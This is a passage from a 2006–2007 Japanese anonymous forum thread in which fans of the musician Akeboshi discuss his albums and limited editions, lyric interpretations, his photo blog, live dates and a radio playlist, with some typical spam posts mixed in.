147 :NO MUSIC NO NAME:2006/07/21(金) 15:05:47 ID:17HRU36L
>>146
私は一枚頼んだけど合計が3700円で大丈夫だったよ。
あとそのほかに窓口で手数料が110円くらいかかった。

148 :NO MUSIC NO NAME:2006/07/24(月) 04:06:47 ID:78dtXhvS
アリガトウゴザイマス無事注文しました


149 :NO MUSIC NO NAME:2006/07/25(火) 19:06:37 ID:smYeku9v
書き込み少ないな…明星人気ないのかな?

150 :NO MUSIC NO NAME:2006/07/25(火) 19:38:46 ID:xtD05ESJ
ホント書き込み少ないね!
みんなAkeboshi知らないんじゃない?

151 :NO MUSIC NO NAME:2006/07/26(水) 18:27:57 ID:NS6I4GoE
ていうかネタが無いんだよな。

癒し系ブログぐらいしか

152 :NO MUSIC NO NAME:2006/07/28(金) 15:59:02 ID:461pPWa8
早くライブやってほしいな。
まだ明星のライブ見た事無いから楽しみ。

153 :NO MUSIC NO NAME:2006/07/29(土) 00:46:57 ID:Yhe9uEX+
例のイベントか…

154 :NO MUSIC NO NAME:2006/07/30(日) 08:45:13 ID:kaThAycC
仙台・・・。
遠ぃな・・・。

155 :NO MUSIC NO NAME:2006/07/31(月) 13:55:55 ID:PCPf5b9M
>>150
NARUTO見て良いと思った人は少なくないはず・・・

156 :NO MUSIC NO NAME:2006/07/31(月) 17:07:06 ID:FTolaGoM
私はNARUTO見て好きになりました!
WINDに癒されてアルバム買ったりYELLOW MOONを毎日聴いてます!
ライブに行ってみたいです!

157 :NO MUSIC NO NAME:2006/08/01(火) 00:13:47 ID:UeQBrK8z
アニメOPの黄月は絵がイマイチだったよな。
windが良かったから期待してたのに。

158 :NO MUSIC NO NAME:2006/08/04(金) 09:41:44 ID:oISADvqh
Windもいいな〜と思ってレンタルしたけど、
Yellow Moonのほうにもっと魅力感じて、
最近よく聴いてます。
低めのキーなのがいい感じなんで、
大サビは高くならないほうがよかったかも・・・
ところで全部の曲を制覇するだけなら
買わなくていいCDはありますか?
「Akeboshi」は録り直しされてる?

159 :NO MUSIC NO NAME:2006/08/04(金) 20:08:21 ID:AMvwjhGy
windの英語訳わからないのですが、どこかに載ってたら
教えてください。

160 :NO MUSIC NO NAME:2006/08/04(金) 21:44:28 ID:yg6J1rQO
8日に無料ライブあるからヒマ人は来いぉ。
仙台こうとうだい公園だお

161 :NO MUSIC NO NAME:2006/08/05(土) 12:35:09 ID:iXmQJxCn
>>159
シングルに載ってますよ。

Windはシングルバージョンの方がなんだか好き。

162 :NO MUSIC NO NAME:2006/08/05(土) 21:17:50 ID:TuUl2NHz
曲の雰囲気的に、windは子供の時で
Windは大人になったって感じだ

163 :NO MUSIC NO NAME:2006/08/06(日) 21:39:56 ID:X4l3AoUX
stoned〜から聴いてるけど
writing over〜が一番好きだ
あのシングルはこれがタイトル曲だったら
もっと人気でたかも。

164 :NO MUSIC NO NAME:2006/08/08(火) 22:17:08 ID:gylKlciC
自分はPerunaが好きだな。ハモりがとても綺麗!
メジャーになってからのジャケットはずっとあのイラストの感じなのかな。凄い好きだ

Whitereplyに初回だけ入ってたっていう曲(not realだか)、聞きたかったな…もう少し早くCDを買っていれば…



165 :NO MUSIC NO NAME:2006/08/12(土) 18:27:31 ID:aO80cKVD
仙台行った人いる?

166 :NO MUSIC NO NAME:2006/08/12(土) 19:22:49 ID:Lci0qY2f
初回とか限定仕様なのは、
white replyのタワレコ
akeboshiのジャケ違い
yellow moonのシール付き
これで漏れないですか?

167 :NO MUSIC NO NAME:2006/08/14(月) 20:05:02 ID:yEX0R2jl
多分それでおk

168 :NO MUSIC NO NAME:2006/08/14(月) 23:10:52 ID:tBErXfmN
誰か廃墟のソファのデモテープ持ってない?

詳細を聞きたいのですが

169 :NO MUSIC NO NAME:2006/08/20(日) 18:44:45 ID:8HHchm2j
9月22日(金) 青山・月見ル君想フ 18:30open / 19:30start
【古明地洋哉 presents "ENDLESS WALTZ" vol.2 古明地洋哉×明星/Akeboshi】
ticket:adv\3,000(w/o drink)/ door\3,500(w/o drink)
ticket order :青山・月見ル君想フ〔TEL〕03-5474-8115 詳細はこちらの"Ticket Order"へ
    ◆8/21古明地洋哉 presents"ENDLESS WALTZ" vol.1会場にて先行発売!
    ◆店頭発売日 8月22日16:00〜9月21日22:00
    ◆インターネット予約 8月29日0:00〜9月12日24:00

170 :NO MUSIC NO NAME:2006/08/20(日) 21:28:12 ID:f3M/R8uU
関西でもライブやってくれないかなあ。

white replyの限定盤欲しくて仕方がない・・・

171 :NO MUSIC NO NAME:2006/08/25(金) 23:18:35 ID:uJ/K31xV
明星ブログに書くこと何か無いのかよwwww

172 :NO MUSIC NO NAME:2006/08/27(日) 09:54:15 ID:GaO8Seyf
>>171
イエロームーンの歌詞の意味とかは?
ずっと考えてたんだけど未だハッキリした意味がでないので・・・

173 :NO MUSIC NO NAME:2006/08/27(日) 09:58:25 ID:coO9m92V
>>172
アレは井上陽水の言葉遊び的な物じゃないの?
アジアの純真のとかも意味ない歌詞だったじゃん?

174 :NO MUSIC NO NAME:2006/08/27(日) 14:04:45 ID:xbg6WxTm
イエロムーンの歌詞は結構好きだ

ブログは完全に写真集と化しているなw

175 :NO MUSIC NO NAME:2006/08/27(日) 20:39:46 ID:fz1narg0
明星のCD買おうと思ってるんだけど、どれがオススメ?

176 :NO MUSIC NO NAME:2006/08/28(月) 00:35:23 ID:IuzMRMEJ
Yellow Moonの歌詞、
火星に行くのが面倒→地球からより近い月へ?
3つ数えて〜まだ夢を見てる
→新月から3日目で三日月になって、影の部分は
「まだ寝ている」と表現?
とか勝手に考えてる。歌詞好きです。

177 :NO MUSIC NO NAME:2006/08/28(月) 10:29:15 ID:c7uVNmN7
目をみて、目をみて背を向け合いながら、目をみていつ会える・・・
ってのは月を彼女に例えてると思うんだけど。おかしい?
日食・月食を彼女の気持ちに例えて。

178 :NO MUSIC NO NAME:2006/08/28(月) 19:43:48 ID:MnbjV3c8
>>175
とりあえずAkeboshi買っとけば良いんじゃないか?
インディーズの曲大体入ってるし

179 :224.36.138.58.dy.bbexcite.jp:2006/08/28(月) 20:11:02 ID:EAylG7wP
mはい

180 :NO MUSIC NO NAME:2006/08/28(月) 23:00:46 ID:URqj3p39
Yellow Moonの歌詞って結構深いんだねえ。

181 :209.58.111.219.dy.bbexcite.jp:2006/08/29(火) 08:15:56 ID:0Ty0lnyX
j

182 :NO MUSIC NO NAME:2006/08/29(火) 22:11:11 ID:UPTJSzcL
>>178
ありがとう。早速注文するわ!

183 :NO MUSIC NO NAME:2006/09/08(金) 01:01:57 ID:ydy+BxN+
ブログの写真って全部明星撮影なんですよね?
マジで癒されるから写真集にして欲しいw

184 :NO MUSIC NO NAME:2006/09/08(金) 17:14:39 ID:ZfEUChjO
>>183
何かの形にしてくれるんじゃないかとひっそり期待してる。

二宮ピョン吉にウケまくりなんだがw

185 :NO MUSIC NO NAME:2006/09/15(金) 21:09:17 ID:dpOCg2uS
ライブ行きたかったけど行けなくなった

186 :NO MUSIC NO NAME:2006/09/15(金) 23:26:32 ID:feKpuE6l
>>185
売ってください!

187 :Akari:2006/09/16(土) 00:31:59 ID:x1JtPxSS
 明星凄くいいですよねぇ〜(*´艸`)
曲が素敵すぎる(笑)

188 :NO MUSIC NO NAME:2006/09/16(土) 23:51:07 ID:LEUyIAP9
Yellow Moon借りてきたお、暗い曲だがいいね

189 :NO MUSIC NO NAME:2006/09/18(月) 05:54:00 ID:TLFYqnXP
>>188
個人的には
Peruna
花火
Deep End
がオススメ
特にPeruna

歌詞が好きだわ

190 :NO MUSIC NO NAME:2006/09/18(月) 20:23:38 ID:zdVDF+J0
Deep Endの歌詞で何喋ってるのか気になって
夜も眠れません

191 :NO MUSIC NO NAME:2006/09/18(月) 20:47:11 ID:niZDOBxS
>190
気になりますよね


何か過激な事言ってる感じはしますよね

192 :NO MUSIC NO NAME:2006/09/18(月) 21:12:27 ID:Ux2uNHWi
Trust what you do.
Trust what you are.
って言ってるとこがあるような

193 :NO MUSIC NO NAME:2006/09/18(月) 22:08:56 ID:LmV6dmmz
fu*kって言ってるとこない?

194 :NO MUSIC NO NAME:2006/09/19(火) 02:44:38 ID:AszB4Xfl
>>193
f*ckなのか、>192さんの言うwhatなのか聞き取れないけど
歌詞を載せなかったところを見ると前者の可能性は否定し切れないですよね


タイトルは「強烈な最後」みたいな意味になるっぽいと思うのですが、そこからアメリカか日本かの
今のやり方のままでは大変な終末を迎えてしまう的な歌詞なのではないでしょうか?

195 :NO MUSIC NO NAME:2006/09/21(木) 22:38:21 ID:TCcWjaYu
つまり戦争に対するプロテストソングってことかな?
writing over the sign も反戦を歌ってるような気がする

196 :NO MUSIC NO NAME:2006/09/21(木) 22:54:26 ID:kadJQRRU
>195
多分そうだと思います

それから、わざと「what」を「fu*k」に聞こえるように歌ってるのかも知れませんね

writing over the signの「black armor」とか、「Wait soldier ants」の辺りって反戦って感じですよね

197 :NO MUSIC NO NAME:2006/09/23(土) 23:21:14 ID:IAJgIi2i
ライブあったんだっけ?

198 :NO MUSIC NO NAME:2006/09/24(日) 21:45:48 ID:OG+X2G9W
ライブ行った人おらんのかね〜?

199 :NO MUSIC NO NAME:2006/09/28(木) 09:59:51 ID:IiukDx0p
ブログ、撮りためた写真貼ってるだけだな
もともと気が進まなかったんだろうけど、
少し投げやりじゃないかと思う
応援してる人のこと考えてるのかな

200 :NO MUSIC NO NAME:2006/09/28(木) 15:36:07 ID:Q+nm/lbI
自分は写真だけでも和むから満足。

201 :NO MUSIC NO NAME:2006/09/29(金) 00:34:52 ID:VCpY4p5X
自分も今のブログで満足してる
以前は何考えてるのか全く謎だったけど
少しだけ身近に感じられるようになったよ

個人的にはプライベート垂れ流しされた方がら萎える

202 :NO MUSIC NO NAME:2006/09/29(金) 03:33:30 ID:PW5/lAZP
そうゆうことに頓着ないんだろうね
アケボシらしーやね

203 :NO MUSIC NO NAME:2006/09/29(金) 07:31:41 ID:QadC/PA6
写真ブログ明星らしいじゃん。
明星が音楽を愛していて、
私達が明星の音楽を好きならそれでいい

204 :NO MUSIC NO NAME:2006/09/30(土) 00:12:48 ID:jTbAJb7p
ぬこの写真キボンヌ

205 :NO MUSIC NO NAME:2006/09/30(土) 18:07:19 ID:Dh07SZlV
CDどこにも売ってねぇ

206 :^^:2006/09/30(土) 22:55:44 ID:ajQTHF2a
明星ってTOPSPINっていうサークルある?

207 :NO MUSIC NO NAME:2006/10/01(日) 00:21:25 ID:GBh2JgDj
大学じゃなくてミュージシャンの「Akeboshi」スレですよ
ところでファンレターとかどこに送ればいいんだろう・・・
もしかしなくても拒否られてるのか

208 :みーこ:2006/10/05(木) 23:41:23 ID:lCenBWp1
あけぼしさんのブログは手抜きではありません
写真すきです。毎日みてるのだ

209 :NO MUSIC NO NAME:2006/10/06(金) 05:08:18 ID:nVkaxxKP
Green dayo
に吹いたwwwww

210 :NO MUSIC NO NAME:2006/10/07(土) 01:20:02 ID:E/scx4NW
ワロタw


211 :NO MUSIC NO NAME:2006/10/07(土) 09:05:46 ID:pEbBMbPz
何気にこんなの初めて見たwwwww

212 :NO MUSIC NO NAME:2006/10/08(日) 08:46:34 ID:3ozjAbt5
身長何センチぐらいかな?

213 :NO MUSIC NO NAME:2006/10/09(月) 00:05:00 ID:riZjg8BI
見た感じちょっとだけ低めな感じ?
ライブで見たときに170あるかないかくらいな気がした。

214 :NO MUSIC NO NAME:2006/10/09(月) 08:18:10 ID:iNah8AX+
ライブで座高が高い印象を持った

215 :NO MUSIC NO NAME:2006/10/09(月) 09:32:44 ID:woL98esq
足短いよね……

216 :NO MUSIC NO NAME:2006/10/09(月) 18:38:32 ID:RRut5+ME
胴長ってダックスフントを思い出した
Akeboshiカワユス

217 :NO MUSIC NO NAME:2006/10/13(金) 22:09:00 ID:0P7Tozm2
明星住んでるのって田舎なのかなあ。
いいなあ。

218 :NO MUSIC NO NAME:2006/10/16(月) 20:10:13 ID:aZf/7TOu
家が綺麗そうだよなあ。レコーディング部屋とかあるんだろうなあ・・・
そういえば何県出身だ??

219 :NO MUSIC NO NAME:2006/10/16(月) 20:35:27 ID:qLvaYGwk
神奈川。横浜じゃなかったっけ?

220 :NO MUSIC NO NAME :2006/10/16(月) 21:14:13 ID:PiEzTIAI
忍者アニメから少しずつ明星ワールドへ・・・
ようやくソトコトのCDゲト。
最初何処に収録されているか分からなく
早送りしすぎて一回目終了orz

221 :NO MUSIC NO NAME:2006/10/16(月) 23:27:02 ID:gJjzgMub
そろそろ次のリリースしてほしいな・・・
年にシングル2枚アルバム1枚のペースだとうれしいんだけど
これまでを考えると無理か

そういや新曲ばかりのフルアルバムってまだないねorz
でも「akeboshi」のアレンジは全部よかった
Hey Thereとか廃墟のソファが特に

222 :NO MUSIC NO NAME:2006/10/17(火) 06:33:06 ID:av+WugQA
私ミニアルバム派だなあ。windは特に。聞き比べてみると結構声変わったよね

223 :NO MUSIC NO NAME:2006/10/17(火) 15:29:42 ID:qNQv0WcE
ソトコト欲しい!ウラヤマー!
私もミニアルバムの編曲の方が好きだー
声変わったね。windに関しては昔の声の方が拙さ?があって好き。
明星は自分の声が嫌いといってたな。

224 :NO MUSIC NO NAME:2006/10/17(火) 20:55:14 ID:hIZ5tkKx
もったりしてる感じがする。でもカワユス。

225 :NO MUSIC NO NAME:2006/10/17(火) 21:00:13 ID:av+WugQA
自分の声嫌いなんだ?

226 :NO MUSIC NO NAME:2006/10/17(火) 23:14:57 ID:/3WrXUU8
Yellow Moonの「guitar」の「ター」が無駄にセクシーだw

227 :NO MUSIC NO NAME:2006/10/19(木) 00:22:20 ID:77Pz4KZo
「ター」いい!
windはミニのドーンクラーイのクラーのところがいい!


228 :NO MUSIC NO NAME:2006/10/19(木) 21:31:07 ID:aAmybCW/
>>218

ラジオで言ってたが、長野県だと思う。

229 :NO MUSIC NO NAME:2006/10/25(水) 22:33:23 ID:TI8OWvqX
サンマうまそーーー

230 :NO MUSIC NO NAME:2006/10/26(木) 20:44:08 ID:kyAqWPDN
>>229
あれ、自分まだ書き込んでないはずなのに…

231 :NO MUSIC NO NAME:2006/10/27(金) 01:13:07 ID:j3hhMaPI
誰かホワイトリプライの限定のやつオクに出してくれー
3000までなら出せる

232 :NO MUSIC NO NAME:2006/10/29(日) 12:25:44 ID:deRagx2x
Akeboshiって写真のセンスもあるね

233 :NO MUSIC NO NAME:2006/10/30(月) 18:02:51 ID:e68lEfKY
今日、AkebosiとYELLOW MOON買ってきました。今から学校なんですが、さぼって聴けばよかったかな…?学校終わるのが楽しみです。

234 :メン:2006/10/30(月) 21:58:02 ID:r7hrn1Ll
私は今日学校のパソコンでAkeboshi聴いてました!!

235 :NO MUSIC NO NAME:2006/10/30(月) 21:58:38 ID:LkHYnKDW
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。俺も頑張らなきゃなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。探してもいない。泣きたくなった。                   


このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。 
信じるか信じないかはあなた次第です。


236 :NO MUSIC NO NAME:2006/10/30(月) 23:00:35 ID:e68lEfKY
帰宅して、Yellow MoonとAkebosi聴きました。最初のミニアルバムより声が渋くなってましたね。素敵です。
Yellow Moonをかけている時、暴れていた、うちのハムスターが急に静かになったので、籠を見たら、回し車の上で寝ていましたw

237 :NO MUSIC NO NAME:2006/10/30(月) 23:40:36 ID:H5HWPDKm
うちの猫にも聴かせてみるか

238 :NO MUSIC NO NAME:2006/11/01(水) 19:35:47 ID:7zPMvk42
>>237
ぬこはどうだった?

239 :NO MUSIC NO NAME:2006/11/02(木) 13:53:26 ID:WPfnMp3q
どうでもいいかも知れませんが、Akeboshiさんのブログの10月28日の記事、
あのクジャクの写真は多摩動物公園で撮ったものだと思われます。
事務所の裏の駐車場にクジャクが居るのを見たので。
Akeboshiさんに確認してみたい。

240 :NO MUSIC NO NAME:2006/11/05(日) 01:43:30 ID:oUru59PE
明星海外旅行中?

241 :NO MUSIC NO NAME:2006/11/05(日) 19:57:25 ID:RHR+EhEl
そういえばYellow moon期間限定サイトが消えていました!!

242 :NO MUSIC NO NAME:2006/11/06(月) 21:15:57 ID:nsJoBl6q
新曲発表もうすぐだったりして…
海外はPV撮影とか

243 :NO MUSIC NO NAME:2006/11/06(月) 21:26:44 ID:nsJoBl6q
そういやYellow Moonの2番サビ、
周りのスタッフ?の勧めで高く変更したんだよね。
余計なこと言うなよorz
低いほうがよかったよー

244 :NO MUSIC NO NAME:2006/11/06(月) 21:27:53 ID:HsobA94B
スタッフ失敗だね

245 :NO MUSIC NO NAME:2006/11/08(水) 07:16:48 ID:j21V/Qw/
Akeboshiが完全にプロデュースしてりゃいいのに
それにメジャーに行かない方がいい曲書けるだろうな
新曲を出さなければならないという縛りがAkeboshiには向いてないと思う
でもAkeboshiは音楽で食べることを選んだらなら、
ある意味エペクの言いなりでも仕方ないといえば仕方ないよな・・・
一年に一度出るか出ないかのミニアルバムをまだかまだかと待って、
その間曲を味わいつくして聞いていたのが楽しかったな・・・

246 :NO MUSIC NO NAME:2006/11/08(水) 20:50:09 ID:ScvrkxpO
同意。明星のまったりペースが好きだ。
一曲一曲にすごい思い入れができるし、一曲一曲に価値を感じる。


Yellow Moonのサビは、自分はあれで好きだけどね。

247 :NO MUSIC NO NAME:2006/11/08(水) 20:53:33 ID:I9TgP5uz
イインダヨ!

248 :NO MUSIC NO NAME:2006/11/11(土) 16:56:13 ID:yVPQl0G5
sound好きな方いらっしゃいません?皆さんあまり話題に出してないみたいですが、あの曲も歌詞も印象的で大好きです。

249 :NO MUSIC NO NAME:2006/11/11(土) 21:35:20 ID:4kSzDWDC
Soundsはメロディも歌詞も衝撃的だよね

確かあの曲はAkeboshiの実体験なんだっけか?

250 :NO MUSIC NO NAME:2006/11/13(月) 22:49:08 ID:Du0DUIXG
ブログのにゃんこカワユス
撮り溜め分じゃないなら帰国したのかもな

251 :NO MUSIC NO NAME:2006/11/14(火) 21:35:24 ID:lLqMxVW6
そういえばブログ見返してて映画音楽やったって書いてあったが
誰か見に行ったひといらっしゃる??

252 :NO MUSIC NO NAME:2006/11/20(月) 00:41:44 ID:n3kpCehq
ho

253 :NO MUSIC NO NAME:2006/11/25(土) 21:14:45 ID:cs4CK4Ej
安芸

254 :NO MUSIC NO NAME:2006/11/27(月) 02:37:33 ID:az4hu0Kb
新曲でないかなぁ


憂鬱な時に聴くno wish(STONED TOWN収録版)は最高に凹むね

255 :NO MUSIC NO NAME:2006/11/27(月) 18:53:15 ID:Bz9IRE2w
Why so many people〜てとこ好きだなあ。

256 :NO MUSIC NO NAME:2006/11/28(火) 06:01:06 ID:sXccUhA6
>>255
ああ、そこいいねぇ

257 :NO MUSIC NO NAME:2006/12/02(土) 12:52:19 ID:gUN2unwL
Sayonara Autumun
ってのが良いね


師走だぁ

258 :NO MUSIC NO NAME:2006/12/03(日) 18:55:58 ID:Sz5u9O9U
Yellow MoonとかRusty lanceってかなり音高いと思うんだけど、
音階で言うとどこまで出てるか(Hiなんとかとか)わかる人いませんか?
本人も全部のパートを地声で歌ってるわけじゃないですよね…
どこまでが地声か区別がつかない

259 :NO MUSIC NO NAME:2006/12/03(日) 20:06:00 ID:rfkXANjM
地声はかなり低いよ。

この中で北海道の明星のラジオ番組聞いてた人いる?

260 :NO MUSIC NO NAME:2006/12/04(月) 20:14:55 ID:IDzQXCdP
ブログ見た感じだとようやく動き出したか?

261 :NO MUSIC NO NAME:2006/12/04(月) 21:09:30 ID:/WALQ3W2
>>259
ノシ
あれで紹介されてた明星の好きな音楽、もう1回教えて欲しい。
カーラ・ブルーニとレナード・コーエンしかCD持ってないよ…

262 :NO MUSIC NO NAME:2006/12/04(月) 22:52:03 ID:p4eG4bus
いくらかノートに書いてあるよ。

263 :NO MUSIC NO NAME:2006/12/05(火) 16:49:38 ID:ID1ws3/o
教えてほしいです(´・ω・`)

264 :NO MUSIC NO NAME:2006/12/05(火) 17:22:52 ID:br9aGN8s
確か明星はエレクトロニカが好きとか言ってなかったけ?


今暇ないからあとで

265 :NO MUSIC NO NAME:2006/12/07(木) 17:13:24 ID:Tktl8Yb9
ゼラチン成分って何だw

266 :NO MUSIC NO NAME:2006/12/07(木) 21:19:26 ID:L0/6Ypyd
jelly(確かライブで一緒になったか何だかの人)って事か?

267 :NO MUSIC NO NAME:2006/12/07(木) 22:43:33 ID:N/B14ycO
>>265 ああ〜そういう事か・・・

268 :NO MUSIC NO NAME:2006/12/07(木) 23:09:45 ID:20Yv7g4s
アルバムまだですか

269 :NO MUSIC NO NAME:2006/12/09(土) 00:38:51 ID:iQldwYf1
 

270 :NO MUSIC NO NAME:2006/12/09(土) 17:34:47 ID:jwOTlZEI
  ∩_∩
 ( ・ш・) <ツルポ
 (つ旦と)
 と_)_)



271 :NO MUSIC NO NAME:2006/12/12(火) 19:09:54 ID:QyKdRGLd
>>259
ノシ

NORTH WAVEね。なつかしい。
思えばそれでHey There聴いてはまったんだよな〜

272 :NO MUSIC NO NAME:2006/12/13(水) 00:51:11 ID:jdR0zJ5w
>>259
聞いてたノシ
明星の喋り方が見た目まんまのもっさりな感じが妙に良かったw
明星行きつけのお店とか無駄に通ってみたりしたなー

>>261
自分はビョークのジャズアルバムしか持ってない
ビョーク苦手だけどこのアルバムは好きだなあ

273 :NO MUSIC NO NAME:2006/12/16(土) 18:29:55 ID:r/YZ+FPS
明星のラジオで流された曲のアーティスト(一部)

lizcaprol
athete
altam
bob dylan
schneider tm
royksopp
lali puna
magnet
john wheelan
len graham
mat molloy
ian archer
phones
savatht savalas
raz ohara
mum
funkstrorng
nikakoi
altan
k.d.lang
telefon tel ayiy
gel
makeles
adam skinner
doctor rockit
ben harper
carla bruni
notwist
nouvelle vegue
velvet under ground

274 :NO MUSIC NO NAME:2006/12/17(日) 12:34:11 ID:LIZ7T2Kl
新作まだー
半年に一枚ペースは当たり前なのね
メジャーに移ってちょっとは早くなるかなあと思ったけど
早く新曲いっぱいのアルバム聴きたい

275 :NO MUSIC NO NAME:2006/12/17(日) 13:56:42 ID:ZuAhP442
>>273
もの凄くありがとう(´∀`)

276 :NO MUSIC NO NAME:2006/12/20(水) 00:02:59 ID:fSZ/8t69
「Akeboshi」の「神様の舌打ち」の5:00あたりから入っている
インストがすごくイイ!
哀と楽のベストミックス。

277 :NO MUSIC NO NAME:2006/12/25(月) 16:59:57 ID:fLY3tNBV
akeboshのクリスマスソングを聞いてみたい

278 :NO MUSIC NO NAME:2006/12/26(火) 09:29:05 ID:2JnhTnS9
ブログ、どこがデザイン変わったの?

279 :NO MUSIC NO NAME:2006/12/26(火) 11:55:13 ID:b4ED+ruT
俺もワカンネ

280 :NO MUSIC NO NAME:2006/12/26(火) 23:14:07 ID:F5DmN8C6
ケータイのサイトのが変わってたよ


281 :NO MUSIC NO NAME:2006/12/26(火) 23:15:52 ID:YeyRGxg8
たぶん…「Akeboshi Diary」の文字のフォントが、
変わった気がなんとなくしなくもないような。ネコは居たっけ?

282 :NO MUSIC NO NAME:2006/12/29(金) 18:35:42 ID:GVsKWObR
>>278
レーベルゲートのブログサービスに移った。


ところで時の舟 celtic version聞いてたら泣けてきた
ああいう系のちょっと明るめのもいいよな

283 :NO MUSIC NO NAME:2006/12/30(土) 02:19:29 ID:h5WCcSC0
Windをエキサイト翻訳してみた


あなたが理想主義的な前に、あなたの渇望を修練してください。
あなたの怒りに彼らをわからせる動機を与えてください。
山を登ること。決して、降ります?
中身を始めてください。決して落ちないこと。

私が12であったように、私のひざはまだ震えています。
内密に教室を外へ盗むこと。
男性は二回私をののしりました、しかし、私は気にかけませんでした。
待つことは、私のような人々のために浪費しています。

それほど賢く生きようとしないでください。
あなたがそれほど正しくそうである従兄弟に嘆願しないでください。
偽物または恐れで乾かないでください。
あなたが結局はあなた自身嫌いである従兄弟。

あなたは、言います、「夢は、夢です。
私は、もう馬鹿なことをするつもりではありません。
「私がなだめる従兄弟は、私の魂を得ました。」と、あなたが言います

あなたの血が遅くする必要があるあなたの時間赤ちゃんを連れて行ってください。
「あなたの魂を破ってください。」、「あなたが暗くなる前に、あなた自身と連絡をとってください。」、
恐れのReflectionは、何もの影を作りません。

あなたが曲がった道を見るならば、あなたはまだ盲目です。
そこの従兄弟は、常に、あなたが見る点へのまっすぐな行き方です。

284 :NO MUSIC NO NAME:2006/12/30(土) 13:28:36 ID:LDeX9YSB
Windは、「敷かれたレールに安易に乗らず、自分を信じて
やりたいことやれ」ってことだよね?たぶん。

A Nine Days' Wonderがよくわからん…
相当暗い歌詞なのはなんとなく。
Yellow Moonも難解だけど、その直感的な歌詞がすごくいいし、
アレンジも完璧、一番好きな曲。

285 :NO MUSIC NO NAME:2006/12/30(土) 20:19:26 ID:8zGE9hdN
>>284
「A Nine Day's Wonder」
の歌詞の和訳

どんなに心を震わす出来事もいずれ忘れてしまう。
振り返れば日が沈むように時は過ぎてしまうから
ボロボロの壁に人生を描こう
ある日彼女はいつもの声で言った
「あなたは輝きを失った」と。僕は笑いながら言った
「君なら取り戻せるかい?」
彼女は独り立ち止まり葉が落ちるのを見ていた。
たくさんの場所、たくさんの道があるけど僕には居場所はなく帰路もない。
たくさんの顔が消えてなお僕は生きていく。

夢から外れた琥珀は輝く
闇に生きる老兵は光りを見ることは痛みを増すだけだと言う。
彼の話が聞けない今、僕は荷物を詰めてバス停へ向かう。
星が黄色い雨や花火のように流れ始める。
僕は独り立ち止まり星が落ちるのを見ていた。

君の知るこの世界でまだ生きている
そこで待ってて 僕の人生はまだ続くから

286 :NO MUSIC NO NAME:2007/01/01(月) 00:19:30 ID:9zyhLiRF
おめでとう

287 :NO MUSIC NO NAME:2007/01/01(月) 17:51:20 ID:ejUrF3IL
ハッピーニューイヤー

288 : 【大吉】 :2007/01/01(月) 22:32:24 ID:Anmj/0nf


289 :NO MUSIC NO NAME:2007/01/03(水) 11:59:45 ID:N68Slvxs
あけましておめでとおう!!

290 :NO MUSIC NO NAME:2007/01/04(木) 23:46:39 ID:eGvJ9qo5
ブログが404……

291 :NO MUSIC NO NAME:2007/01/05(金) 07:22:22 ID:DK3BMED7
age

292 :NO MUSIC NO NAME:2007/01/06(土) 02:39:00 ID:tSVqUZlP
お〜い
今日ってライブあるのかな?
宮城でやるやつ
オフィシャルにはなんも出てないけど・・・

293 :NO MUSIC NO NAME:2007/01/06(土) 03:40:41 ID:iK9XpVTI
油age

294 :NO MUSIC NO NAME:2007/01/10(水) 22:31:13 ID:AfFnFTx8
ミュージックスクエアで作りかけの新曲

295 :NO MUSIC NO NAME:2007/01/11(木) 02:34:21 ID:ODQ/sOz/
>>294
詳しく!作りかけってなんだ…

296 :NO MUSIC NO NAME:2007/01/11(木) 16:47:46 ID:YnP68Kkp
>>295
ラフミックス(すべてのパートを録り終えたあとにとりあえずバランスを取ってスタジオで
聞いてみるテイクのこと)の段階で届けてくれたらしい。確かタイトルは「フォロー」。
ええ感じでしたよ。

297 :NO MUSIC NO NAME:2007/01/11(木) 18:52:14 ID:h54yjl94
明星って最初は顔を出さない謎めいた人だと思ってた…

298 :NO MUSIC NO NAME:2007/01/12(金) 16:04:56 ID:q76U3S6U
早く公式で視聴させてほしい

299 :NO MUSIC NO NAME:2007/01/12(金) 18:13:17 ID:syPHNW7y
初回(予約?)限定のakebosiのCDって何があるんですか?

300 :NO MUSIC NO NAME:2007/01/12(金) 23:34:53 ID:dNXqUrW+
age豆腐

301 :NO MUSIC NO NAME:2007/01/15(月) 00:30:26 ID:HJHpgL9T
>>296
歌詞はどんな感じだった?

302 :NO MUSIC NO NAME:2007/01/15(月) 19:18:02 ID:84AMC2IU
オレも知りたい!!

303 :NO MUSIC NO NAME:2007/01/15(月) 20:42:32 ID:woG8lSq0
明星のCDでの付属品って「WHITE REPLY」のサイドストーリーのカードと、
「Yellow Moon」の初回限定オリジナルステッカー以外に何かありましたっけ?

>>296 詳細希望

304 :NO MUSIC NO NAME:2007/01/16(火) 02:35:50 ID:iUI6HJk/
サイドストーリーってなんだ!?

限定はアルバムのデジパック、Yellow Moonステッカー、
white replyの1曲多いやつ?
最後のはレアすぎてもう手に入らないね

305 :NO MUSIC NO NAME:2007/01/16(火) 21:09:21 ID:9oIcvXVc
2chオワタ\(^o^)/


VIPPERが官邸ブログに突撃して悲惨なことになってる
総理大臣も見るらしいからただではすまないかもしれん
ttp://kantei.bblog.jp/


306 :NO MUSIC NO NAME:2007/01/16(火) 22:15:07 ID:56pQ7XyS
>>304 どうもありがとうございます!
サブストーリーは、薄い紙にそれぞれに曲の経緯?なんかが書いてありました。

「初回限定アルバムのデジパック」探しに探して1つだけ見つけたんですけど…
新品4500円でした…(どう思いますか?
中古でもいいのでもっと安くでないものですかねぇ〜

307 :NO MUSIC NO NAME:2007/01/16(火) 23:06:26 ID:iUI6HJk/
>>306
高いと思う。
ここ数ヶ月かで何度か出品されてるのを見かけたけど、
そこまで高くなってなかったような。
自分はamazonマーケットプレイスで新品2500円くらいで運よく買えた。

308 :NO MUSIC NO NAME:2007/01/17(水) 23:35:41 ID:Mg6sC8X3
やっぱり高いですかぁ〜どうしよう。
この機を逃したらもう見つからない気が…
新品2500最高!
どこかで安いの見かけたら情報提供お願いします。

早く新曲でないかなぁ〜。


